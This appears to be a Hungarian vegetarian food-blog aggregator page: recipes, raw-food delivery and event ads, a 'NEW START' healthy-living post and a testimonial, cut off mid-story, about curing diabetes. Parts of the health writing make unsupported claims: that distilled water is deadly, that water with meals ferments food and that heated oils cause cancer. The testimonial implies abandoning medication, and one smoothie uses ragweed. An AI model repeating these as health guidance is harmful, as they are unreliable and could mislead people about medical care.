Ha gasztroblogról van szó, természetesen fontos számomra a styling is és a kiváló fotó. Én mindig úgy tesztelem a képeimet, hogy megmutatom I.-nek és megkérdezem tőle: Csorog a nyálad, ha meglátod ezt a képet?. :) Ha igen a válasz, elégedett vagyok. Persze előfordul, hogy az én képeim sem sikerülnek jól. Néha tombolok, mert nem tudom a képet úgy megkomponálni, ahogyan azt elképzeltem. Igen, a food styling egy külön szakma, tanulni kell. Nem csak odarakok az asztalra egy tányért, rá az ételt, lefotózom és már kész is. Előkészületet igényel, tervezést, beállítást. Aztán figyelni kell a fényviszonyokra, a fényképezőgép beállítására és az összhatásra is (és ott van az utómunka a képekkel, a sztori és a recept megírása). Készítettem már olyan képeket, amelyekkel nem voltam elégedett és nem is kerültek fel a blogra. Történt olyan is, hogy néhány nappal később újra megfőztem-megsütöttem az adott ételt, nekiálltam a fotózásnak és másodszorra már sikerült.
A fotózás és a food styling terén is kezdőnek tartom magam, de gyakorlat teszi a mestert (ez tényleg igaz) és napról napra többet tanulok (plusz vannak kiváló könyvek és blogok is, amelyek ebben segítenek)... egy új szakmát... és ez nagyon jó. A Zizi kalandjai hobbi, szeretek főzni, sütni, újdonságokat megosztani veletek, bemutatni, hogy a vegetáriánus konyha igenis sokszínű és csak egy kicsit kell hozzátenni, hogy varázslatosat alkossunk. Annak ellenére, hogy hobbi, néha több időt töltök vele, mint a hétköznapi munkámmal... mert nagyon szeretem. A blog a gyermekem, amellyel sokat foglalkozom és törődök. Remélem ezt látjátok is! :)
A teljesség igénye nélkül néhány blog, amelyeket nagyon szeretek (nemcsak gasztroblog kategóriában): Vegasztrománia, Á la carte kulinária, Praliné Paradicsom, Mandula Sarok, Édes és keserű, Az élet napos oldala, Eszter befőz, Asztika blogja, Tisztatészta, Étel ital kicsivú, Kísérleti konyha, Babette főz, Sütimizéria, Rakottkert, Imbisz, Flatcat, Jépatojta van, Green Tearoom, Mindennapi ételeink, Csak a Puffin ad neked erőt, Juci útja, Ahol a malac nem túr, Irány London blog, 360 fok bringa, Józsi bácsi gondolatai a világról, Renifoto, Csajbringa, Kicsi Ház, Trip in AUS és még sorolhatnám...
Szóval nem lesz könnyű az idei Goldenblog szavazás. Egy-egy kategóriában nem is tudom, hogy kire adjam le a voksomat, amikor olyan sokan megérdemelnék a 15 perc hírnevet! Ti már szavaztatok?
És a sok szöveg után jöjjön már végre a banánkenyér, ugye? Egy korábbi banánkenyér receptet itt találtok.
Vegán mandulás csokis banánkenyér
Hozzávalók:
- 1 bögre teljeskiörlésű tönkölyliszt
- 1/2 bögre tönköly fehérliszt
- 2 teáskanál sütőpor
- 1 teáskanál só
- 2 evőkanál őrölt lenmag + 1/4 bögre (60 ml) víz
- 1/2 bögre zabtej (rizstej, szójatej is használható)
- 1/3 bögre nádcukor
- 3 db érett banán
- 1 vaníliarúd kikapart magjai
- 1/2 bögre mandula
- 1/2 bögre 70%-os csokoládé, felaprítva
Egy tányérban törjük pépesre a banánokat. Egy száraz serpenyőben pirítsuk meg a mandulaszemeket 4-5 perc alatt és vágjuk durvára. Egy tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni 6-8 percig (ez helyettesíti a tojást). Melegítsük elő a sütőt 180 fokra.
Egy tálban keverjük össze a száraz hozzávalókat: lisztek, sütőpor, só. Egy másik tálban keverjük össze a zabtejet a nádcukorral és a banánnal. Adjuk hozzá a vaníliát és a vizes lenmagot, majd ezt a keverék öntsük a száraz hozzávalókhoz. Keverjük bele a pirított mandulát és csokoládét.
Az összekevert tésztát öntsük egy 25 cm hosszú püspökkenyér formába és 180 fokon süssük 40-45 percig (végezzünk fogpiszkáló próbát, hogy jól átsült-e már a kenyér, akkor jó, ha a fogpiszkálóra már nem ragad semmi). Délutáni kávéhoz, teához, de másnap reggelire is kiváló!
Házhoz mennek az élő ételek!
2012. augusztus 19. Gitta nyersétel blogja
Nagy boldogsággal tölt el, hogy a Vegafood vegetáriánus ételszállító cég segítségével már egyre több helyre tudjuk eljuttatni nyers vegán ételeinket! Budapest összes kerületébe, Budakalászra, Budaörsre, Dunakeszire, Fótra, Gödöllőre, Pomázra, Törökbálintra, Szentendrére és Ürömre szállítunk. Ezen kívül Szegedre és két hete már határon túlra is, Bécsbe szállítják el élő ételeinket. A Nyersétel Akadémián profi szakácsaink elkészítik, a Vegafood pedig házhoz szállítja! Augusztus 27-től pedig már Kecskeméten is lehet rendelni, a vegetáriánus, vegán és nyers vegán ételek házhoz mennek! Most egy kis ízelítő a 34. hét kínálatából, ha a fent felsorolt városok valamelyikében laksz, regisztrálj és rendelj a Vegafood oldalán! A menünket a lap alján, a Z kódon találod meg! Zöld turmixok, levesek, kétféle főétel, édesség és aszalvány van most az étlapon. Ételeink nem tartalmaznak állati eredetű alapanyagokat, valamint glutént, szóját, hozzáadott cukrot. Kizárólag gyümölcsből, zöldségekből és diófélékből, olajos magokból dolgozunk. Kóstold meg az egészség ízét! Az egészséged a legdrágább, kezdd el a változást, változtass ételeden! http://www.vegafood.hu/main/main.php?page=rendeles Szerdán a Z5 kódon Álom csokigolyó Kedden a Z6 kódon zöldséges ropogós keksz Nyers vegán pizza kedden a Z4-es kódon! Ne feledd, semmi dolgod, mint megrendelni az egészséges, friss nyers ételeket!
Diótej (készítése házilag)
Ismét egy növényi tejjel próbálom megbarátkoztatni az olvasóközönséget. Nagyon intenzív íze van, elkészítése pedig őszintén állíthatom, gyerekjáték. Tejbegrízt főztem vele, de magában is fogyasztható, vagy kiváló öntet müzlihez. Barackturmixhoz is remek alap. A lényeg, hogy erős turmixgépet használjunk. Ami legalább 500 Watt teljesítményű. A recept: Hozzávalók: 1 bögre (2 dl) dió 3 bögre (2 dl) víz igény szerint édesítőszer (méz, gyümölcscukor, nyírfacukor, stívia, stb.) sűrű szövetű szűrő turmixgép Elkészítés: A vizet felforraljuk és a dióra öntjük. Ha van időnk, akkor néhány órát áztatjuk - mondjuk egy éjszakát, vagy míg a munkából hazaérünk, stb. Ha erre nincs lehetőségünk, akkor megvárjuk, míg a dióra öntött forró víz kihűl annyira, hogy a turmixgépbe tehetjük. A turmixgépbe öntve egyszerűen csak összeturmixoljuk az egészet. Kikapart vaníliarudacskával tovább ízesíthetjük. Az alaposan összeturmixolt lét sűrű szövetű szűrőn keresztül átszűrjük és kész is a finom, laktató diótej. A szűrésből visszamaradt diót a továbbiakban bármilyen diós dologhoz felhasználhatjuk. Kenyér, palacsinta töltelék, sütemény, stb. A diótej felhasználásának csak saját fantáziánk szabhat határt. Én palacsintát és tejbegrízt készítettem belőle. Illetve egy keveset el is kortyolgattunk.
Gyümölcsös kuszkusz felfújt
Sokan gondolataikban összekeverik a kuszkuszt és a kölest. Na már most. A köles, az valamivel nagyobb szemű általában, és ami a lényeg, önálló növény. Míg a kuszkusz búza-töret, búza-őrlemény már előre feldolgozott formája. A kuszkusznak elég meleg folyadék ahhoz, hogy megszívja magát és megpuhuljon, a kölest pedig rövid ideig főzni kell a forró vízben. Szerény véleményem szerint a köles egészségesebb, eleve lúgosító hatással bír, míg a kuszkusz "csak" búza felhasználásából készült, egyfajta tésztaféle. Viszont praktikus "konyhatartozék", mivel alig van vele munka. Az alábbi nassolni való, komolyan mondom, gyorsabban elkészült, mint maga a gyümölcsök felaprítása. A recept: Hozzávalók: 1 bögre kuszkusz 1,5 bögre kókusztej gyümölcs (barack, körte, alma volt jelenleg, de bármi más megfelelő) édesítő (méz, gyümölcscukor, nyírfacukor, stívia, áztatott datolya stb) folpack Elkészítés: A forró kókusztejhez hozzáöntjük az előzőleg megmosott kuszkuszt. Amíg megdagad, addig előkészítjük a gyümölcsöket. Megmossuk, felkockázzuk, felszeleteljük őket. A kuszkuszt édesítjük ízlés szerint. Akár úgy, hogy nagyon érett banándarabokat szétnyomkodunk és azt keverjük hozzá. A gyümölcs egy részét hozzákeverjük a megduzzadt kuszkuszhoz. Egy tálat kibélelünk frissentartó fóliával, és gyümölcsszeleteket fektetünk az aljába a fóliára. Fontos, hogy a fólia lelógjon bőven a tálról. (Még ne vágjuk le.) A gyümölcsös kuszkusz felét belenyomkodjuk óvatosan, hogy az alján fekvő gyümölcsszeletek ne menjenek kárba. Az elsimított rétegre gyümölcsöt teszünk. Majd a maradékkal betakarjuk. A fóliával befedjük és kb. 1-2 órára hűtőbe tesszük. Függően attól, hogy mennyire lédús gyümit használtunk a felfújt készítése során, elképzelhető, hogy valami "szósz", vagy lekvár jól jön a tortácskához. Én egyszerűen sárgabarackot turmixoltam össze - ha szükséges, édesíthető, ezt öntöttem a szeletek tetejére tálalásnál, illetve ezzel díszítettem az egészet. Rendkívül egyszerű és gyors sütemény. 30 perc alatt bőven elkészül. Akár reggelire is elkészíthető. Nagy melegben jóleső hűsítő finomság. UI: Biocsicsóka sűrítményt is keverhetünk hozzá - segít, hogy ne hirtelen növekedjen meg a vér cukorszintje, ha pl. mézzel készítettük el.
Barackos jégnyalóka
2012. augusztus 7. Lét-tudatos konyha
Tejmentes, gyümölcsös édesség, amit otthon is könnyen elkészíthetünk. A boltokban kapható fajtáktól eltérően, ez nem szörpből, hanem gyümölcsből készül, és nem tartalmaz mesterséges ízanyagot, vagy festéket.
Marcipános-sárgabarackos zabkása
2012. augusztus 6. Mindennapi ételeink
Ez valami fantasztikus volt, mindenképp érdemes kipróbálni, aki szereti az édes reggelit, annak akkor, aki nem, annak ebéd utánra, estére. :-) Hozzávalók: 4 dl vaníliás szójatej 5 dkg jumbo mazsola 2 dl apró szemű zabpehely 6 szem sárgabarack 5-6 ek. nyírfacukor Marcipánmassza Elkészítés: A vaníliás szójatejet feltesszük főni és amikor forr, beleöntjük a zabpelyhet és a mazsolát. Puhulásig főzzük, ekkor ízesítjük nyírfacukorral és citromhéjjal. Tálaláskor bőséggel karikázunk rá a marcipánrúdból és szórunk rá sárgabarackot is. Egyszerű és nagyszerű. :-)
Almás-körtés zöld lé
Megint csináltam egy jó nagy adag smoothiet Mindig az aktuális zöldek, és az éppen érő gyümölcsök vannak benne Most például: csalán lucerna sárgarépa levele parlagfű 2 zsenge hajtása édeskömény levele kapor kövér porcsin petrezselyemzöld zellerszál uborka nyári alma nyári körte A hozzávalókat alaposan megmossuk folyó hideg víz alatt, és átpréseljük, díszítjük egy gyönyörű Ambrózia levéllel(parlagfű);) [...]
Őszibarack fagyi
Nagyon meleg van ma, csak könnyű, hideg gyümölcs jöhetett számításba vacsira 3 napja folyamatosan aludnék, és alszom is sokat:) Remélem, a gyógyulási fázis miatt Hozzávalók személyenként: 2 őszibarack (innen a fáról ? 1/2 kávéskanál fahéj Botmixerrel összedolgozzuk, és 1/2 órára berakjuk a fagyasztóba Mennyei finom És íme a fagyi a naplementében Kategória:édességek, Nyers ételek, Receptek [...]
Sárgabarack turmix
Ki szeretne inni egy gyors turmixot mondjuk reggeli kezdésként? Én biztos szívesen választanám, főleg sárgabarack szezon idején! :)
A recept:
Hozzávalók:
- 8-10 szem sárgabarack (kisebb méretűek esetén több)
- növényi tejpor (tejszín ízű szójatejpor - lila doboza van -)
- 2 dl víz
- néhány szál mentalevél
- turmixgép
Elkészítés:
A barackokat megmossuk, kimagozzuk és darabokra vágva a turmixgép poharába tesszük. Teszünk hozzá 3 evőkanál tejport, öntünk bele 2 dl vizet és addig turmixoljuk, míg a barack teljesen összetörik és sűrű, de folyékony italt kapunk.
Édesíteni azért sem szükséges, mert a barack gyümölcscukrot tartalmaz (főleg, ha puha, érett), a tejporban is található némi édesítő anyag.
Mentalevéllel díszíthetjük, de ha azt is elfogyasztjuk, megízesíti italunkat.
UI: Természetesen bármely más növényi tejjel, vagy akár vízzel is elkészíthető!
Te is innál még egy pohárral? Ezt a gyerkőcök se hagynák ki!
Hideg őszibarack krémleves
Könnyű, hűsítő leves ezekre a meleg napokra. Ráadásul gyógyít is Hozzávalók személyenként 1 őszibarack 1 tk zabpehely 1 leheletnyi tiszta só 1 késhegynyi jázminpakóca ( csak ha nem elég édes a barack) 2 dl forrásvíz A hozzávalókat összeturmixoljuk, és fogyasztásig a hűtőben tároljuk Jó étvágyat!!! ? Őszibarack élettani hatásairól ezt találtam nektek: Az őszibarack Kína [...]
Nyári sali
Nem csak a melegebb (még ha tűzforró is) napok miatt kedvenc évszakom a nyár, hanem azért is, mert ilyenkor egy nagyobb adag salátával, ami elsősorban ugye nyers zöldségekből készül, remekül jól lehet lakni, ráadásul egészségesen átmossa a szervezetet. A zöldségekben lévő ásványi anyagok, sók és vitaminok a lehető legtermészetesebb módon kerülnek szervezetünkbe hasznosításra. Igaz, hogy Eleken a legtöbb napom saláta-reggelivel indult. Ezt örömmel tartom itthon is, ugyanis érzem jótékony hatását. Az ember mozgása sokkal könnyedebb, és az emésztés is lényegesen rövidebb idő alatt megtörténhet. Szóval a nyár nálam egyenlő azzal, hogy nem hiányzik a kenyérféle, sem a tészta, de még a gabonákat (mint pl, barna rizs) is csak olykor-olykor fogyasztom. Hiszen ha az ember elszabadul egy piacra, vagy van egy szorgos anyósa :), mint nekem, esetleg saját veteményes kertje (azokat picit irigylem), akkor zöldség-gyümölcs Kánaánban lehet része. Egy ilyen lehetőség pedig adja az alkalmat a mindennapi sok nyers-étel fogyasztására. Ezek közül következzen egy nyári saláta változat. A recept: Hozzávalók: 1/4 fej jégsaláta (másfajta saláta is jó) 2 zsengébb cukkini 4 normál méretű uborka (amit kovászolni szoktak) - 3 paradicsom - 3 paprika - 1 lila hagyma - igény szerint só (himalaya vagy tengeri) és hidegen sajtolt olaj, esetleg magvak, valamint őrölt petrezselyem Elkészítés: A megmosott zöldségeket feldaraboljuk az uborkát és a cukkinit a lila hagymával együtt megfosztjuk héjától, és szintén felaprítjuk. A (jég)saláta leveleit széttépkedjük. Az egészet egy nagy (salátás) tálba tesszük és salátaszedő kanalak, vagy fakanál segítségével összekeverjük. A saláta alapja ezzel elkészült. Attól függően, hogy valaki diétázik-e vagy sem, és milyen diétát folytat, lehetőség van arra, hogy megszórjuk sóval, öntsünk rá hidegen sajtolt olajat, vagy adjunk hozzá magvakat. Én ezt csak apróra vágott petrezselyemlevéllel ízesítettem. Úgy is finom volt. Eleken megesett, hogy őrölt lenmagot és őrölt szezámmagot is szórtam a tetejére. Jó nagy adag lesz belőle. Ha két ember csak ezt vacsorázik, akkor szuper eleség estére. Milyen jó lenne az embereknek a csipszes zacsikat és a sok édességet felcserélni legalább nyár idején ehhez hasonló tévézéshez, filmnézéshez fogyasztott csemegéhez!!! Ezt a salátát fogyaszthatjuk előételként is, amellett, hogy önmagában is laktat. Vagy egy egyszerűbb pörkölt mellé. De elkészíthetjük kerti parti alkalmával egy paprikás krumpli, vagy grillen sütött ételekhez kínálva. Sokan becitromozzák a salátákat. Nem értem miért. Eleken is kértem őket, hogy ne tegyenek citromlevet a salátáimra. Rendesek voltak, mert mindig pohárban külön kaptam meg. Valószínű onnan jön ez a felesleges szokás, hogy az emberek megszokták, a zöld salátát ecetes cukros vízzel fogyasztják... De könyörgöm, citrommal megsavanyítani ezt a csúcsfinom salátát - MINEK? Szerény véleményem szerint esetleg egy kevés sóval sokkal gazdagabb ízvilágban lehet részünk, mint minden egyes zöldségnek savanykás ízt adni. Vagy tévedek? Javítsatok ki! UI: Ha van otthon maradék főtt lencsénk, beleszórva még tovább ízesíthetjük!
NEW START életmód alapelvei I.
Az Eleki egészségközpont témával foglalkozó bejegyzéseim során többször említést tettem a "new start" életvitelről. Ez ugye a tényleg egészséges életmód alapelveinek angol nyelvű mozaikszava. New start annyit jelent, mint új kezdet. Nézzük, melyek azok a nyolc alapelvek, amelyek betartásával egészséges, minőségben jobb életben lehet részünk: N utrition = táplálkozás E xercise = testmozgás W ater = víz S unshine = napfény T emperance = önuralom A ir = levegő R est = pihenés T rust = hit, lelki egyensúly Válaszd az életet a helyes életmód alapelveivel. A világ sokat változott, de az alapelvek nem. Mindenki szeretne boldog lenni, de a boldogság egyik kulcsa az egészség. A 8 alapelv, a szó valódi értelmében valóban alapelv, és nem valami csodaszer, amitől az ember néhány nap alatt meggyógyul. Jelentősen javítani lehet az állapotunkat vele. Minőségi javulást lehet elelérni az alapelvek alkalmazásával. Fontos, hogy türelmet igényel. Mi viszont türelmetlenek vagyunk. Sokszor nem tudunk várni és gyógyszereket, vagy különböző csodaszereknek tűnő italokat, tablettákat alkalmazunk, próbálunk alkalmazni gyógyulásunkért... A következetes és türelmes betartása az alapelveknek - ez vezet hosszú távú eredményhez. Betartásuk által a szervezetünk bámulatos dolgokra képes. Azt gondoljuk, hogy csak mással történhet meg az, hogy cukorbeteg, rákos, szívbeteg, reumás lesz. De az egészség az nem valami véletlen dolog. Ezért dolgoznunk kell. Ne bízzuk a véletlenre. Ha valaki 2-3 évtized alatt elrontott valamit, azt nem lehet néhány hét alatt helyrehozni. Ha valaki különböző szerektől várja a javulást, még ha ideig, óráig meg is kapja, de az alapelvek elhanyagolása újabb és újabb problémákhoz vezet. Tüneti kezelésre képesek ezek a különböző készítmények, de a probléma okát nem oldják meg. Hiszen legtöbb esetben a betegségeink forrása a helytelen szokásainknak köszönhetők. Tudatosan odafigyelve az életvezetésünkre, hasznunkra szolgál. Testünk legjobb állapota érhető el az alapelvek betartása által. Táplálkozás A betegségek 40-60% a helytelen táplálkozásból adódik. Sok állati fehérje az első megemlítendő tényező. Csontritkulás is első sorban a helytelen táplálkozásnak köszönhető. A túlzott fehérje bevitel kivonja a csontokból a kalciumot, így gyorsabb csontritkuláshoz vezet. 100-110 gr fehérjét fogyaszt a magyar ember. Elég azonban 50-60 gr is. Elsőnek a gyomor, és a kiválasztó szervek sínylik meg, majd a többi szerv is hosszútávon. Hús, állati fehérje bomlásakor ugyanis képződnek olyan bomlástermékek, amelyek a szervezet számára károsak. Ezeket kiüríti a szervezet a bélcsatornán keresztül, vagy májba szállítja a véráramlat segítségével, miközben károsodnak az érfalak, szövetek, maga a máj is. Sok zsiradék esetében, nem csak állati zsírokról kell említést tenni, hanem növényi olajokról is. Magyarországon kialakult az a tendencia, hogy az állati zsírok káros hatásának tudatában átszoktunk a margarinokra, növényi olajokra. A hevítési eljárás során az olajok részecskéi gyökképző folyamatokban vesznek részt. A telítetlen olajláncok igen gyorsan reakcióba lépnek. Gyökös reakciókba, ami daganatos megbetegedésekhez vezet nagyon gyakran. Olajra szükség van. Növényi olajok fogyasztása javasolt, mértékletesen, és nem mindegy, hogy melyik olajféléket válasszuk. Egyszeresen telítetlen kötést tartalmaz az olíva olaj, amelynek fogyasztását orvosok is javasolják, kis mennyiségben. Azonban a margarinok és az úgynevezett főzőolajok szintén károsak a szervezetünkre. Ezért ha lehet az ételbe utólag hidegen sajtolt növényi olajat csepegtessünk, vagy válasszuk az olajok természetes forrását az olajos magvak fogyasztásával. Zsiradék másik káros hatása az elhízásban játszik szerepet. 1 gr zsír energiatartalma annyi, mint 1 gr olajé. Margarinfélék - transzzsírsavak - művi, gyári úton készítik őket. Szív és érrendszeri, illetve daganatos betegségek alakulhatnak ki rendszeres használatuk, fogyasztásuk során. Sok a cukor fogyasztása. Statisztika szerint napi 10 dkg cukrot fogyasztunk. Elhízás, fogszuvasodás, cukorbetegség - mind napjaink legelterjedtebb betegségei. Hazánkban jelenleg is fél millió cukorbeteget tartanak számon, plusz egy millió veszélyeztetett létezik, akiknél nem sok hiányzik a cukorbetegség kialakulásához. Egyre fiatalabbakat érint. Hiszen társadalmunk nagy része reggel-délben- este cukros leveket fogyaszt és rengeteget nassol. Az ember minden étkezést szeret édes ízzel lezárni. Ilyenkor gondoljunk arra, hogy a cukor felesleges kalória. Cukorral szemben viszont hiányt szenvedünk: vitaminokban, ásványi anyagokban. A helyes felszívódáshoz szükséges alapelemek. Ezek hiányoznak a finomított ételekből (fehér liszt, és belőle készült kenyér, finomított étolajok, stb.) Mivel az átlagember finomított, és nagyipari eljárás során készült ételeket fogyaszt leginkább, így vitaminokat és ásványi anyagokat nem megfelelően juttat a szervezetbe. Ha az étel nem tud felszívódni (fentiek hiányában), akkor zavart szenved a felszívódás. Az étel a bélcsatornába tovább halad, ott erjedni kezd, majd előbb utóbb vastagbél betegségek - mint pl. vastagbélrák alakulnak ki. A kevés rost fogyasztása is általános probléma. Rost dús táplálkozást teljes őrlésű gabonák étrendünkbe történő helyezésével érhetjük el. A rost olyan, mint az autó kereke. A táplálék ezek segítségével halad az emésztés útján. Fontos a szervezetben az egyensúly. Túl sok rost elzáródást okozhat, tehát nem kell állandóan korpát juttatni a szervezetbe. Ha mégis korpát eszünk, a zabkorpa jobb - vízoldható, csökkenti a koleszterin szintet. Búzakorpa ellenben felsértheti a beleket. De a rostfogyasztásunk lehetőleg ne csak abból álljon, hogy reggelire korpát eszünk. Ha pedig korpát fogyasztunk, legyünk mértékletesek. Növényi táplálék előnyben részesítése által több rosthoz jut hozzá szervezetünk. Helyesen alkalmazva a növényi étrendet, tudományos háttérrel a birtokunkban, nem vezet hiánybetegséghez. Testmozgás Izomzat segítségével képzelhető el a helyes testmozgás. Az izomzat annál jobban erősödik, minél intenzívebben munkavégzésre serkentjük. Heti legalább 2-3 alkalommal INTENZÍV testmozgást végezzünk! Nem takarítás, házimunkát, hanem elkülönített testmozgást. Az emberi szervezetünk mozgásra van teremtve. Ha nem mozgunk, leépülünk. Mozgás hatására erősödik a szívizomzat, az immunrendszer és javul a vérkeringés. Vérkeringés javulása következtében pedig a vérnyomást normalizálja. Csontrendszer állapotát javítja. Emellett a belső szervek anyagcseréje gyorsul, jobb lesz a gyomorműködés is. Az egész emberi testet megfiatalítja. Endorfin hormon termelődik általa. Reggel intenzív fizikai aktivitás után nem csak friss, üde lesz az ember, hanem az endorfin hormon - fájdalomcsillapító és nyugtató hatása jelentkezik. Reggeli mozgás után vegyünk egy rövid váltott fürdőt (vagy sima fürdés, zuhanyzás is jó) és a változásunk hatásos, észrevehető lesz. Szellemi munka végzése során szükség van a vérkeringés javítására. Az agyban ugyanúgy képződnek bomlástermékek, de ezek a hajszálereken nehezebben távoznak. Ezért kell a testmozgás a szellemi munka végzése után. Jobb, mint a pihenés. Kicseréli az agy vérhálózatát. Frissesség lép a helyére, agyfunkció javul általa. Stresszhelyzetre is ezért alkalmas egy aktív testmozgás, kirándulás szabad levegőn. Könnyebben kezeli a helyzetet az ember ez által. Friss vér jut ugyanis az agyba. Stressz hatására az agyban keletkező káros bomlásterméktől kitisztítja a testmozgás. Víz Legfontosabb anyag földünkön. Hozzá hasonló anyag nincs. Energiára is felhasználható. Gőzzel is lehet munkát végezni. Gépeket üzemeltetni, sportolni és gyógyítani is lehet vele. Megfagyásakor hőt ad le. Megfagyott vizek felett ezért melegebb van. Vadludak is a jégre mennek melegedni. Rejtett hő melegíti a vadludakat. Víz külső és belső használata. Belső vízhasználat: ne várjuk meg a szomjúság érzését. Ugyanis ekkor már vészreflexként jelez a szervezetünk (ellenben az étkezésnél ez nem igaz). A víztartalék ekkor már minimálisra csökken vissza. 2.5-3 l víz távozik a szervezetből naponta. Ezt pótolni kell vízivással elsősorban, másodrészt pedig ételekkel. Ezért is fontos, hogy napi 2 liter tiszta vizet fogyasszunk. A hajtól kezdve, az egészséges szemen át a belső szerveknek is létfontosságú a víz. Aki nem figyel oda a megfelelő napi vízmennyiség bevitelére, az megbetegíti a szervezetet. Fejfájás gyakorta alakul ki - a szervezet így jelzi, hogy nem kapott elég vizet. Emellett az ereknek és a vérnek ugyanúgy szüksége van vízre, mint a szemnek. Sokak látása azért is romlik, mert elhanyagolják a vízivást, emellett még cukros (vagy mesterségesen édesített) és állati fehérjékben gazdag ételeket fogyasztanak. A víz oldószer is - vitaminokat old és szállít is. Hőszabályozásnak fontos része. Az izomzat munkát végez, a test hőmérséklete megemelkedik. 43 fok felett veszíti el a test a működését. Fehérjék kicsapódnak. A párolgás mindig hűtéssel jár. Mikor fogyasszuk a vizet? Étkezés közben ne. Emberi test szilárd ételekre van beállva. A szilárd táplálékhoz képest a pépes táplálék rossz emésztést okozhat. Evés közbeni ivás - elpépesíti a bevitt élelmiszert - szervezetünk nem érti, miért tértünk vissza a pépes keverékre. Az emésztő enzimeket, nedveket is felhígítja az étkezés közbeni víz, így a gyomorműködés lelassul, az étel pedig erjedésnek indul. Cukros üdítő fogyasztása amúgy is erjedést okoz. Étkezés előtt fél órával nagyobb mennyiségű víz, és étkezés után 1-1.5 órával igyunk ismét vizet. Ebéd után már akár 2 dl folyadék fogyasztása is megzavarja az emésztést. Rossz közérzethez és rossz emésztéshez vezet. Szomjúságérzet rossz jele a szervezetnek. Félünk a víz szennyezettségétől. Desztillált vizet ne fogyasszuk hosszútávon - halálos lehet -, mivel nincsenek benne a szükséges ásványi anyagok. Víz külső hatása - jó hővezető - pl. nedves dunszt eltevésnél eredményesebb lehet, mivel könnyebben vezeti a hőt. Szauna - nedves gőz hatáson alapul. A gőz a bőrnek átadja a hőt. Nem javasolják 10-15 percnél tovább benn tartózkodni - gyorsan felhevíti a szervezetünket. Hideg vízzel gyorsan le lehet hűteni a szervezetet. A kétfajta hőmérsékletű víz váltott használata - pl. (láb)fürdő esetében - jelentősen megnövelheti az immunitást. Fehérvérsejtek működését is megnöveli. Aki esténként ilyen megoldást választ, kevesebbszer betegszik meg, valamint a migrénes fejfájás is váltott vizes fürdővel kezelhető. Persze nem egyszeri alkalommal. 3 perc meleg vizes zuhany - fél perc hideg vizes többször elvégezve jó hatással bír az egész szervezetre.
Programok a Nyersétel Akadémián
2012. július 26. Gitta nyersétel blogja
A jövő heti programokról szeretnélek tájékoztatni benneteket! Orvos válaszol! 2012. július 31-én délután 17 órától dr. Kuklis Eszter lesz a vendégünk, ahol kötetlen beszélgetés formájában megtudhatod mindazt, amire kíváncsi vagy a nyers étkezésről - egy orvos szemével. Ha kételyeid vannak, vagy valamilyen egészségügyi problémád, akkor itt a helyed, most válaszokat kaphatsz a kérdéseidre. A program ingyenes, gyere, téged is várunk szeretettel! A beszélgetés alatt lehet nyers szendvicseket, édességeket kóstolni, és innivalók is lesznek. Mindenképpen érdemes bejönni, jó hangulatú estének ígérkezik a program. Nyers fasírt és főzelék parti! A másik programunk augusztus 2-án csütörtökön lesz, délután 17 és 20 óra között: Nyers fasírt és főzelék parti, ahol a legfinomabb nyers fasírtokat és főzelékeket kóstolhatod meg. Munka után egy egészséges, könnyű nyers vacsorára hívunk... belépő nincs, csak az elfogyasztott ételeket kell kifizetni. Lesz finom nyers tökfőzelék (finomabb, mint a főzött változat), és sokféle fasírt. Fasírtban nagyon jók vagyunk. Ne feledd, csak zöldségekből, magokból, fűszerekkel csodákat lehet alkotni, ami mellesleg még egészséges is. Természetesen lesznek édességek és italok is, sokfélét tudsz kóstolni. Várunk téged is! Címünk: Budapest, XIII. Tátra utca 11. 1. emelet 1. 22. kapucsengő Gitta és csapata! (hamarosan receptekkel is jövök, kis türelem még...)
"Meggyógyultam a cukorbetegségből és elhagytam minden gyógyszeremet!"
Az Eleki Egészségközponttal kapcsolatos bejegyzéseim során több tapasztalatot is megosztottam azokkal, akik olvasták írásaimat. Most pedig egy olyan hölgy élményét publikálom, aki a kezdet kezdetén, az első turnuson már ott volt, mint gyógyulásra váró beteg, és azóta már életében szokássá váltak azok a lépések, amelyek minden ember életében egy minőségi javulást eredményezhetnek, ha ezt az ember is akarja és dönt mellette, ezt választja . Az alábbi történetet hallottam tőle.
"20 éven keresztül egy gyermekfaluban gyermekeket neveltem. Ebben a magyarországi faluban egyedül álló anyukákra bíztak gyerekeket. Egy időben akár 5-6-7 gyermek is tartozott egy nevelőanyához. Hosszú idő eltelte után azonban úgy éreztem, egyre kevésbé tudok megfelelni az elvárásoknak, amik felém irányultak, és amiket saját magamnak szintén felállítottam. (Egy gyermeknek egy szülő is kevés, itt ráadásul egyedülálló anyaként neveltünk egyszerre több gyermeket.) Magamra maradtam, befelé fordultam. A nagy terhek az egészségemet is megtámadták. Depressziós tüneteket kezdtem észrevenni magamon, majd az anyagcserém is felborult. Örökös fáradtság is társult mindehhez. Végül a munkahelyemről elküldtek, amit nagy tragédiának éltem meg. Teljesen összeroppantam, bántott a velem történt igazságtalanság, és fájt, hogy elvesztettem azokat a gyerekeket, akik számítottak rám. Így teltek a hónapok az életemben.
Sokkos állapotban voltam a munkahely elvesztése miatt. Ez annyira mélyen érintett, hogy nem tudtam könnyen feldolgozni. Bántott. Éjjel-nappal a gondolataimban volt és pusztított belülről ez az igazságtalanság, méltánytalanság. Aludni is hajnalban tudtam csak. Ez is inkább elszenderedés volt, sem mint, mély alvás. Iszonyatos alvászavaraim voltak tehát, így napközben erőm sem volt az életre. Orvostól orvosig jártam, mivel laboreredményeimben minden egyes tétel rossz volt. Cukorbetegség tünetei is előjöttek, rettegtem attól, hogy inzulinra állítanak, mert egyre magasabbak voltak a cukorvizsgálatok értékei. (Orvos által mért éhomi 8,5 és saját magam által mért 20 körüli érték is volt.) Végül az állapotom és eredményeim miatt a háziorvos is szakorvosokhoz küldött. Koleszterin, zsíranyagcsere, magas húgysav, mindenféle anyagcsere probléma kijött. Ekkor belgyógyász szakorvos gyógyszerekre állított be. Az orvos által javasolt táplálkozást folytattam. De mindez nem vezetett eredményre. Míg legutolsó alkalommal azt mondta az orvos, ha a következő egy-két hónapon belül nem rendeződik a cukor, akkor már csak az inzulin van hátra. Ekkor nagyon megijedtem.
Családomban mindenki inzulinos cukorbeteg. Édesanyám napi 3 inzulinadaggal élt, látását elvesztette, érrendszere is tönkre ment. A hajlam tehát megvan bennem is, a stressz pedig nagyon hangsúlyos rizikótényező. A munkahelyemen az utolsó egy-két év megterheltsége feltűnően erős volt. Tulajdonképpen ez is okozta az anyagcsere folyamatok felborulását. Először csak azt éreztem, hogy nincs erőm.
